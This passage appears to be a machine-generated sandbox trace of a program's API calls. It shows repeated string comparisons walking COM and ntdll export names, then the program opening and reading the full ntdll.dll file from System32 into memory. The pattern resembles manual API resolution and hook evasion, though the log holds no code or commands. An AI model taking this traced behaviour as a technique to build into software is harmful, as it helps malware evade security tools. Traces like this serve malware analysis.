lpString2="CLIPFORMAT_UserSize64") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0135.603] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0135.603] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0135.604] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0135.604] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0135.604] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0135.605] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0135.605] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0135.605] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0135.605] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0135.605] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0135.606] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0135.606] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0135.606] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.606] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0135.607] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0135.608] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0135.608] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0135.608] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0135.609] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0135.609] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0135.609] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0135.609] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0135.610] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0135.825] GetProcessHeap () returned 0x470000 [0135.825] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x415e040 | out: hHeap=0x470000) returned 1 [0135.833] GetProcessHeap () returned 0x470000 [0135.833] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489b30 [0135.833] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0135.833] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0135.833] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0135.833] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0135.833] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0135.834] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0135.834] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0135.834] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0135.834] GetProcessHeap () returned 0x470000 [0135.834] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bba48) returned 0x4155040 [0135.928] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0135.929] ReadFile (in: hFile=0x140, lpBuffer=0x4155040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4155040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0136.117] CloseHandle (hObject=0x140) returned 1 [0136.117] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0136.117] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0136.117] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0136.117] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0136.117] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0136.117] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0136.117] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0136.117] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0136.117] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0136.117] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0136.118] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0136.118] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0136.118] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0136.118] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.118] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0136.118] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", 